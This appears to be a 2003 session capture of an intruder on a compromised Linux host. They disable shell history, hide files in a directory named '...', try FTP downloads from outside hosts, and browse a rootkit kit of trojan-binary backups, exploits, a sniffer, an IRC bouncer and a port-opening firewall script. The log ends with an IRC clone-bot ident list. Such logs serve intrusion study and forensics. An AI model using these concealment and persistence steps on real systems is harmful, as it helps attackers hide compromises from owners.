Mon Jun 16 02:34:02 HKT 2003
================================

Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
unset HISTFILE
]0;root@pc11: /root[root@pc11 /root]# w
  1:30am  up 12 days, 10:21,  0 users,  load average: 0.23, 0.09, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
]0;root@pc11: /root[root@pc11 /root]# mkdir /usr/sbin/"..."
]0;root@pc11: /root[root@pc11 /root]# socklist
bash: socklist: command not found
]0;root@pc11: /root[root@pc11 /root]# cd /usr/sbin/"..."
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ls
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp someshit.netfir,s.com
ftp: someshit.netfir,s.com: unknown host
ftp> by
ftp s]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp someshit.netfirms.com
ftp: connect: Connection timed out
ftp> bye
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# locate emech
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ftp 66.48.76.90
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# 
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# ind / |grep emech
bash: ind: command not found
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep emech
find: /proc/17100/fd: No such file or directory
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep emech
find: /proc/17100/fd: No such file or directory
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# find  / |grep psybnc
find: /proc/17100/fd: No such file or directory
/usr/bin/.rave/.b/log/psybnc.log
/usr/bin/.rave/.b/log/psybnc.log.old
/usr/bin/.rave/.b/src/psybnc.c
/usr/bin/.rave/.b/src/psybnc.o
/usr/bin/.rave/.b/psybncchk
/usr/bin/.rave/.b/psybnc.conf
/usr/bin/.rave/.b/psybnc.pid
/usr/bin/.rave/.b/psybnc.conf.old
/usr/bin/.tux/tools/psybnc
/usr/bin/.tux/tools/psybnc/help
/usr/bin/.tux/tools/psybnc/help/ADDLOG.TXT
/usr/bin/.tux/tools/psybnc/help/DELLOG.TXT
/usr/bin/.tux/tools/psybnc/help/LISTLOGS.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYTRAFFICLOG.TXT
/usr/bin/.tux/tools/psybnc/help/PROXY.TXT
/usr/bin/.tux/tools/psybnc/help/SETLEAVEMSG.TXT
/usr/bin/.tux/tools/psybnc/help/SETAWAYNICK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDAUTOOP.TXT
/usr/bin/.tux/tools/psybnc/help/DELAUTOOP.TXT
/usr/bin/.tux/tools/psybnc/help/LISTAUTOOPS.TXT
/usr/bin/.tux/tools/psybnc/help/SRELOAD.TXT
/usr/bin/.tux/tools/psybnc/help/ADDALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/ADDASK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDBAN.TXT
/usr/bin/.tux/tools/psybnc/help/ADDDCC.TXT
/usr/bin/.tux/tools/psybnc/help/ADDNETWORK.TXT
/usr/bin/.tux/tools/psybnc/help/ADDOP.TXT
/usr/bin/.tux/tools/psybnc/help/ADDSERVER.TXT
/usr/bin/.tux/tools/psybnc/help/ADDUSER.TXT
/usr/bin/.tux/tools/psybnc/help/BCONNECT.TXT
/usr/bin/.tux/tools/psybnc/help/BHELP.TXT
/usr/bin/.tux/tools/psybnc/help/BKILL.TXT
/usr/bin/.tux/tools/psybnc/help/BQUIT.TXT
/usr/bin/.tux/tools/psybnc/help/BWHO.TXT
/usr/bin/.tux/tools/psybnc/help/DELALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/DELASK.TXT
/usr/bin/.tux/tools/psybnc/help/DELBAN.TXT
/usr/bin/.tux/tools/psybnc/help/DELDCC.TXT
/usr/bin/.tux/tools/psybnc/help/DELENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/LISTASK.TXT
/usr/bin/.tux/tools/psybnc/help/DELLINK.TXT
/usr/bin/.tux/tools/psybnc/help/DELNETWORK.TXT
/usr/bin/.tux/tools/psybnc/help/DELOP.TXT
/usr/bin/.tux/tools/psybnc/help/DELSERVER.TXT
/usr/bin/.tux/tools/psybnc/help/DELTRANSLATE.TXT
/usr/bin/.tux/tools/psybnc/help/DELUSER.TXT
/usr/bin/.tux/tools/psybnc/help/ENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/ERASEMAINLOG.TXT
/usr/bin/.tux/tools/psybnc/help/ERASEPRIVATELOG.TXT
/usr/bin/.tux/tools/psybnc/help/ERASETRAFFICLOG.TXT
/usr/bin/.tux/tools/psybnc/help/JUMP.TXT
/usr/bin/.tux/tools/psybnc/help/LINKFROM.TXT
/usr/bin/.tux/tools/psybnc/help/LINKTO.TXT
/usr/bin/.tux/tools/psybnc/help/LISTALLOW.TXT
/usr/bin/.tux/tools/psybnc/help/AIDLE.TXT
/usr/bin/.tux/tools/psybnc/help/LISTBANS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTDCC.TXT
/usr/bin/.tux/tools/psybnc/help/LISTENCRYPT.TXT
/usr/bin/.tux/tools/psybnc/help/LISTLINKS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTOPS.TXT
/usr/bin/.tux/tools/psybnc/help/LISTSERVERS.TXT
/usr/bin/.tux/tools/psybnc/help/MADMIN.TXT
/usr/bin/.tux/tools/psybnc/help/NAMEBOUNCER.TXT
/usr/bin/.tux/tools/psybnc/help/PASSWORD.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYMAINLOG.TXT
/usr/bin/.tux/tools/psybnc/help/PLAYPRIVATELOG.TXT
/usr/bin/.tux/tools/psybnc/help/RELAYLINK.TXT
/usr/bin/.tux/tools/psybnc/help/SETAWAY.TXT
/usr/bin/.tux/tools/psybnc/help/SETUSERNAME.TXT
/usr/bin/.tux/tools/psybnc/help/SOCKSTAT.TXT
/usr/bin/.tux/tools/psybnc/help/TRANSLATE.TXT
/usr/bin/.tux/tools/psybnc/help/UNADMIN.TXT
/usr/bin/.tux/tools/psybnc/help/VHOST.TXT
/usr/bin/.tux/tools/psybnc/help/SETLINKKEY.TXT
/usr/bin/.tux/tools/psybnc/help/SETUSERKEY.TXT
/usr/bin/.tux/tools/psybnc/help/RELINK.TXT
/usr/bin/.tux/tools/psybnc/help/DCCCHAT.TXT
/usr/bin/.tux/tools/psybnc/help/DCCANSWER.TXT
/usr/bin/.tux/tools/psybnc/help/DCCSEND.TXT
/usr/bin/.tux/tools/psybnc/help/DCCGET.TXT
/usr/bin/.tux/tools/psybnc/help/DCCCANCEL.TXT
/usr/bin/.tux/tools/psybnc/help/BREHASH.TXT
/usr/bin/.tux/tools/psybnc/help/LISTTASKS.TXT
/usr/bin/.tux/tools/psybnc/help/SWITCHNET.TXT
/usr/bin/.tux/tools/psybnc/help/DCCENABLE.TXT
/usr/bin/.tux/tools/psybnc/help/AUTOREJOIN.TXT
/usr/bin/.tux/tools/psybnc/help/LEAVEQUIT.TXT
/usr/bin/.tux/tools/psybnc/help/AUTOGETDCC.TXT
/usr/bin/.tux/tools/psybnc/log
/usr/bin/.tux/tools/psybnc/log/INFO
/usr/bin/.tux/tools/psybnc/log/psybnc.log
/usr/bin/.tux/tools/psybnc/log/psybnc.log.old
/usr/bin/.tux/tools/psybnc/log/USER1.TRL
/usr/bin/.tux/tools/psybnc/log/USER2.TRL
/usr/bin/.tux/tools/psybnc/log/USER3.TRL
/usr/bin/.tux/tools/psybnc/log/USER4.TRL
/usr/bin/.tux/tools/psybnc/log/USER1.LOG
/usr/bin/.tux/tools/psybnc/log/USER3.LOG
/usr/bin/.tux/tools/psybnc/log/USER4.LOG
/usr/bin/.tux/tools/psybnc/log/USER1.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER2.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER3.LOG.old
/usr/bin/.tux/tools/psybnc/log/USER4.LOG.old
/usr/bin/.tux/tools/psybnc/menuconf
/usr/bin/.tux/tools/psybnc/menuconf/dialog.h
/usr/bin/.tux/tools/psybnc/menuconf/checklist.c
/usr/bin/.tux/tools/psybnc/menuconf/inputbox.c
/usr/bin/.tux/tools/psybnc/menuconf/menubox.c
/usr/bin/.tux/tools/psybnc/menuconf/util.c
/usr/bin/.tux/tools/psybnc/menuconf/menuconf.c
/usr/bin/.tux/tools/psybnc/menuconf/colors.h
/usr/bin/.tux/tools/psybnc/menuconf/textbox.c
/usr/bin/.tux/tools/psybnc/menuconf/help
/usr/bin/.tux/tools/psybnc/menuconf/help/h101.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h102.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h103.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h104.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h106.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h107.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h105.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h201.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h202.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h204.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h203.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h206.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h205.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h207.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h208.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h209.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h210.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h211.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h212.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h213.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h214.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h215.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h216.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h217.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h218.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h501.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h502.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h503.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h504.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h505.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h301.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h302.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h303.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h304.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h305.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h601.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h306.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h701.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h702.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h703.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h704.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h705.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h706.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h707.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h708.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h709.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h710.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h711.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h712.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h713.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h714.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h716.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h219.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h715.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h220.txt
/usr/bin/.tux/tools/psybnc/menuconf/help/h221.txt
/usr/bin/.tux/tools/psybnc/menuconf/inifunc.c
/usr/bin/.tux/tools/psybnc/motd
/usr/bin/.tux/tools/psybnc/motd/INFO
/usr/bin/.tux/tools/psybnc/motd/USER2.MOTD
/usr/bin/.tux/tools/psybnc/motd/USER1.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER3.MOTD
/usr/bin/.tux/tools/psybnc/motd/USER3.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER2.MOTD.old
/usr/bin/.tux/tools/psybnc/motd/USER4.MOTD.old
/usr/bin/.tux/tools/psybnc/scripts
/usr/bin/.tux/tools/psybnc/scripts/INFO
/usr/bin/.tux/tools/psybnc/scripts/example
/usr/bin/.tux/tools/psybnc/scripts/example/DEFAULT.SCRIPT
/usr/bin/.tux/tools/psybnc/src
/usr/bin/.tux/tools/psybnc/src/p_script.c
/usr/bin/.tux/tools/psybnc/src/match.c
/usr/bin/.tux/tools/psybnc/src/p_blowfish.c
/usr/bin/.tux/tools/psybnc/src/p_client.c
/usr/bin/.tux/tools/psybnc/src/p_crypt.c
/usr/bin/.tux/tools/psybnc/src/p_data.h
/usr/bin/.tux/tools/psybnc/src/p_dcc.c
/usr/bin/.tux/tools/psybnc/src/p_global.h
/usr/bin/.tux/tools/psybnc/src/p_hash.c
/usr/bin/.tux/tools/psybnc/src/p_idea.c
/usr/bin/.tux/tools/psybnc/src/p_inifunc.c
/usr/bin/.tux/tools/psybnc/src/p_link.c
/usr/bin/.tux/tools/psybnc/src/p_log.c
/usr/bin/.tux/tools/psybnc/src/p_memory.c
/usr/bin/.tux/tools/psybnc/src/p_network.c
/usr/bin/.tux/tools/psybnc/src/p_parse.c
/usr/bin/.tux/tools/psybnc/src/p_peer.c
/usr/bin/.tux/tools/psybnc/src/p_server.c
/usr/bin/.tux/tools/psybnc/src/p_socket.c
/usr/bin/.tux/tools/psybnc/src/p_string.c
/usr/bin/.tux/tools/psybnc/src/p_sysmsg.c
/usr/bin/.tux/tools/psybnc/src/p_translate.c
/usr/bin/.tux/tools/psybnc/src/p_userfile.c
/usr/bin/.tux/tools/psybnc/src/p_version.h
/usr/bin/.tux/tools/psybnc/src/psybnc.c
/usr/bin/.tux/tools/psybnc/src/snprintf.c
/usr/bin/.tux/tools/psybnc/src/p_intnet.c
/usr/bin/.tux/tools/psybnc/src/p_topology.c
/usr/bin/.tux/tools/psybnc/src/bsd-setenv.c
/usr/bin/.tux/tools/psybnc/src/p_uchannel.c
/usr/bin/.tux/tools/psybnc/src/psybnc.o
/usr/bin/.tux/tools/psybnc/src/match.o
/usr/bin/.tux/tools/psybnc/src/p_client.o
/usr/bin/.tux/tools/psybnc/src/p_crypt.o
/usr/bin/.tux/tools/psybnc/src/p_dcc.o
/usr/bin/.tux/tools/psybnc/src/p_hash.o
/usr/bin/.tux/tools/psybnc/src/p_idea.o
/usr/bin/.tux/tools/psybnc/src/p_inifunc.o
/usr/bin/.tux/tools/psybnc/src/p_link.o
/usr/bin/.tux/tools/psybnc/src/p_log.o
/usr/bin/.tux/tools/psybnc/src/p_memory.o
/usr/bin/.tux/tools/psybnc/src/p_network.o
/usr/bin/.tux/tools/psybnc/src/p_parse.o
/usr/bin/.tux/tools/psybnc/src/p_peer.o
/usr/bin/.tux/tools/psybnc/src/p_server.o
/usr/bin/.tux/tools/psybnc/src/p_socket.o
/usr/bin/.tux/tools/psybnc/src/p_string.o
/usr/bin/.tux/tools/psybnc/src/p_sysmsg.o
/usr/bin/.tux/tools/psybnc/src/p_userfile.o
/usr/bin/.tux/tools/psybnc/src/p_uchannel.o
/usr/bin/.tux/tools/psybnc/src/p_script.o
/usr/bin/.tux/tools/psybnc/src/p_topology.o
/usr/bin/.tux/tools/psybnc/src/p_intnet.o
/usr/bin/.tux/tools/psybnc/src/p_blowfish.o
/usr/bin/.tux/tools/psybnc/src/p_translate.o
/usr/bin/.tux/tools/psybnc/src/snprintf.o
/usr/bin/.tux/tools/psybnc/tools
/usr/bin/.tux/tools/psybnc/tools/convconf.c
/usr/bin/.tux/tools/psybnc/tools/makesalt.c
/usr/bin/.tux/tools/psybnc/tools/autoconf.c
/usr/bin/.tux/tools/psybnc/tools/chkenv.c
/usr/bin/.tux/tools/psybnc/tools/chkbind.c
/usr/bin/.tux/tools/psybnc/tools/chkipv6.c
/usr/bin/.tux/tools/psybnc/tools/chksock.c
/usr/bin/.tux/tools/psybnc/tools/chktime.c
/usr/bin/.tux/tools/psybnc/tools/convconf
/usr/bin/.tux/tools/psybnc/tools/autoconf
/usr/bin/.tux/tools/psybnc/tools/sys
/usr/bin/.tux/tools/psybnc/tools/.chk
/usr/bin/.tux/tools/psybnc/tools/chksock
/usr/bin/.tux/tools/psybnc/tools/chkenv
/usr/bin/.tux/tools/psybnc/tools/chkipv6
/usr/bin/.tux/tools/psybnc/CHANGES
/usr/bin/.tux/tools/psybnc/COPYING
/usr/bin/.tux/tools/psybnc/FAQ
/usr/bin/.tux/tools/psybnc/Makefile
/usr/bin/.tux/tools/psybnc/README
/usr/bin/.tux/tools/psybnc/TODO
/usr/bin/.tux/tools/psybnc/config.h
/usr/bin/.tux/tools/psybnc/psybncchk
/usr/bin/.tux/tools/psybnc/targets.mak
/usr/bin/.tux/tools/psybnc/psybnc.conf
/usr/bin/.tux/tools/psybnc/makefile.out
/usr/bin/.tux/tools/psybnc/makesalt
/usr/bin/.tux/tools/psybnc/salt.h
/usr/bin/.tux/tools/psybnc/psybnc.pid
/usr/bin/.tux/tools/psybnc/psybnc.conf.old
/usr/bin/.tux/tools/psybnc/fam
/usr/bin/.tux/tools/psybnc/USER1.LOG
/usr/bin/.tux/tools/psybnc/USER1.LOG.old
/usr/bin/.tux/tools/psybnc/USER2.LOG
/usr/bin/.tux/tools/psybnc/USER3.LOG
/usr/bin/.tux/tools/psybnc/USER3.LOG.old
]0;root@pc11: /usr/sbin/...[root@pc11 ...]# cd /usr/bin/.tux/
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# ls
backup  suidsh  tools
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# cd backup
]0;root@pc11: /usr/bin/.tux/backup[root@pc11 backup]# ls
crontab   dmesg     ifconfig  login     ps        tcpd      vdir
df        du        killall   ls        pstree    top
dir       find      locate    netstat   syslogd   updatedb
]0;root@pc11: /usr/bin/.tux/backup[root@pc11 backup]# cd ..
]0;root@pc11: /usr/bin/.tux[root@pc11 .tux]# cd tools
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ls
close  start  stop
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# mc
bash: mc: command not found
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cat start |less
[?1048h[?1047h[?1h=#!/bin/sh
# Firewall By Fracktal
#
# Reviewer notes (added to the captured listing; not part of the original file):
# This is the `start` script shown from /usr/bin/.tux/tools/firewall in the
# recorded session. It takes exactly two arguments, which it labels as the
# SSHD port ($1) and the psyBNC port ($2), and then lists ipchains commands
# that append a catch-all DENY to the input and output chains followed by
# ACCEPT rules for TCP and UDP traffic whose source or destination port is
# $1, $2, or in the range 6660:6669.
#
# NOTE(review): every line from the first bare `:` onward carries a leading
# `:`. The listing was displayed with `cat start |less`, so this is presumably
# pager prompt residue rather than script text; confirm against the file on
# disk before treating those lines as literal shell.
#
# NOTE(review): the 6660:6669 range is presumably IRC traffic, which would fit
# the psyBNC label; the script itself does not say so.

# You don't need to edit anything below this
# Epoch seconds at start; not read anywhere in the visible portion of the script.
STARTTIME=`date +%s`
echo "Firewall rulez"
echo "Presented by Fracktal"
echo "Fracktal@fracktal.us"
echo "(C) 06-10-2002"

# Require exactly two arguments. The usage text shows no argument names as
# captured (they may have been lost in capture; TODO confirm), and the bare
# `exit` returns the status of the preceding echo, so a usage error is not
# signalled as a failure to the caller.
if [ $# != 2 ]
then
 echo ""
 echo "ERROR: You did not specify all the needed commands."
 echo "Usage: $0   "       
 exit
fi

# Report the wall-clock start time and the two ports the rules are built around.
echo ""
echo "Firewall started at :`date +%l:%M:%S`"
echo "SSHD   listening at port : $1"
echo "psyBNC listening at port : $2"
echo ""
:
# Append a DENY rule for all protocols, any source and destination, to both
# the input and the output chain.
# NOTE(review): -A appends and ipchains evaluates rules in order, so on an
# empty chain this DENY would sit ahead of the ACCEPT rules added below.
# Check the chain listing on the host rather than assuming the ACCEPT rules
# are effective.
:printf "Closing all ports... "
:/sbin/ipchains -A input -j DENY -s 0/0 -d 0/0 -p all
:/sbin/ipchains -A output -j DENY -s 0/0 -d 0/0 -p all
:printf "done."
:echo ""
# ACCEPT rules for the first argument (labelled SSHD above): TCP and UDP, as
# source port and as destination port, on both chains. $1 is used unquoted
# and is not checked to be a port number.
:printf "Opening desired ports "
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $1
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $1
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $1
:
# The same eight ACCEPT rules for the second argument (labelled psyBNC above);
# $2 is likewise unquoted and unvalidated.
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $2
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport $2
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport $2
:
# The same eight ACCEPT rules for the hard-coded port range 6660:6669.
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --sport 6660:6669
:/sbin/ipchains -A input -j ACCEPT -s 0/0 -d 0/0 -p udp --dport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --sport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p tcp --dport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --sport 6660:6669
:/sbin/ipchains -A output -j ACCEPT -s 0/0 -d 0/0 -p udp --dport 6660:6669
:
# No ipchains exit status is checked; the success message prints regardless.
:printf "done."
:echo ""
:echo "Firewall rulez started!"
:
:
:
:(END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) (END) [?1l>[?1047l[?1048l]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# qls
bash: qls: command not found
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ls
close  start  stop
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd exploits
]0;root@pc11: /usr/bin/.tux/tools/exploits[root@pc11 exploits]# ls
epcs2         epcs2.c       sendmailx.sh
]0;root@pc11: /usr/bin/.tux/tools/exploits[root@pc11 exploits]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd ssh
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# ls
scp  ssh
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# ./ssh
Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -F config   Config file (default: ~/.ssh/config).
  -A          Enable authentication agent forwarding.
  -a          Disable authentication agent forwarding (default).
  -X          Enable X11 connection forwarding.
  -x          Disable X11 connection forwarding (default).
  -i file     Identity for public key authentication (default: ~/.ssh/identity)
  -t          Tty; allocate a tty even if command is given.
  -T          Do not allocate a tty.
  -v          Verbose; display verbose debugging messages.
              Multiple -v increases verbosity.
  -V          Display version number only.
  -P          Don't allocate a privileged port.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm
  -m macs     Specify MAC algorithms for protocol version 2.
  -p port     Connect to this port.  Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and
              forward them to the other side by connecting to host:port.
  -D port     Enable dynamic application-level port forwarding.
  -C          Enable compression.
  -N          Do not execute a shell or command.
  -g          Allow remote hosts to connect to forwarded ports.
  -1          Force protocol version 1.
  -2          Force protocol version 2.
  -4          Use IPv4 only.
  -6          Use IPv6 only.
  -o 'option' Process the option as if it was read from a configuration file.
  -s          Invoke command (mandatory) as SSH2 subsystem.
  -b addr     Local IP address.
]0;root@pc11: /usr/bin/.tux/tools/ssh[root@pc11 ssh]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# utils
bash: utils: command not found
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd utils
]0;root@pc11: /usr/bin/.tux/tools/utils[root@pc11 utils]# ls
wget
]0;root@pc11: /usr/bin/.tux/tools/utils[root@pc11 utils]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd ecmf
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# cat idents
Katarina
Linux
Fjortisch
Jej^borta
Lamour
Kungen
Marillion
mythic
question
unicron
M0on_STOP
psioncore
O-xyg3n
puppet_m
X_treme
Edgie
triumph
Surfer
outworld
Secret-
Myst0r
ghostie
Forever
Asmodi^Zz
Lordie
En4cer_
vader_
gracie
sweetii
_Andreas_
Bella_
Johnny
Glidaren
PrOxYmA
Jaffa-
Catgirl17
honeii
Latina19
stussy
LenisAway
Borre
shio_
Joelbitar
sweetlady
Willgood
Weebee
cl0biZ-
stj
joshua_
John_Dow
G-Sund
Snoop^Girl
KOJV
slaktarn
Dan21
KBee
lph
Fairsight
Dragon^
Niklas22
Serpentor
Mike^26
Lisa`29
iMP
monikaw
darknz
poofie
ja0
SwePilot
EuroTrash
Khan
capr1corn
Malkav
rainDance
Zinj
Sweklopi
timewalk
jester
jn
Mrb0x
jANNE
ArskaZ
Ably
SveaRike
Servant
Sl0gon
Dr1tte
SpaceDump
Kardinal
Dj_TT
cobe
demig0d
Brujah
flum
[aus]
NatBorta
Mailman
SpaceBBL
Tys0n
Phreaky
ObiWanBip
alex_ndra
Sta^zZz
danic
BlUeAnGeL
zizu
Klaara
Johannes
jossumi
miina_
Master
aulis
Juge_81
tomi20hki
Cathren
JayC
varjo
floutti
hali
mHj
iasv
joni
VuuBeibe
Nallllle
Vicious
abbore
kodE
Mikma
Hazor
wellu_
SunSola
PowerPc
Jonni
Fin
Alikki
Outzake
hoffi
Juutsu
sTeVe
winny
nCuBuS
venus_guy
Smarties
nAtALiE^
rUthLesS
Lingyee
TnX`fck
nana_sk8
Yen_Yen
PIHKAL
w00p
tuNGau
terkukur
zwsiew
pshyche
YoGiEBeaR
Lonelygal
V1
liza
TATANO
LoNeLy
stj
Sch|z0-SH
sperm_boy
Musicgal
V2one
PoPY
WaSaB|BoY
sutera
liverpoo
lisha
niceguy16
WiNg20
tommy
RaIDen16
Sorceress
TuPac
tAku^mUrA
melanie22
suez
Terence15
mac_
vodafone
linda
VireX[0]
TrUst^Me
shearer
zai
sammi
sukun
turbozzzz
musashi
wendy
lopez
Mr_JeE
stjf
liz22
MyWife
R9
lily15
mui-mui
tarabas
sean-18
Lisa29
orac
Raye
ranu
Y2KBug
LoveByte
Siren
Mooks
RotiCanai
LiYen
palia_dog
MaMaKians
alias
Bluey
stinga
Inkworks
Cruizer_1
Monroe
AeroDream
AMBRA1
Lupo
f_r_a
Davide
tennis
rugiada
Furia
lucignol8
alexia
RED
w|lly
sweetii
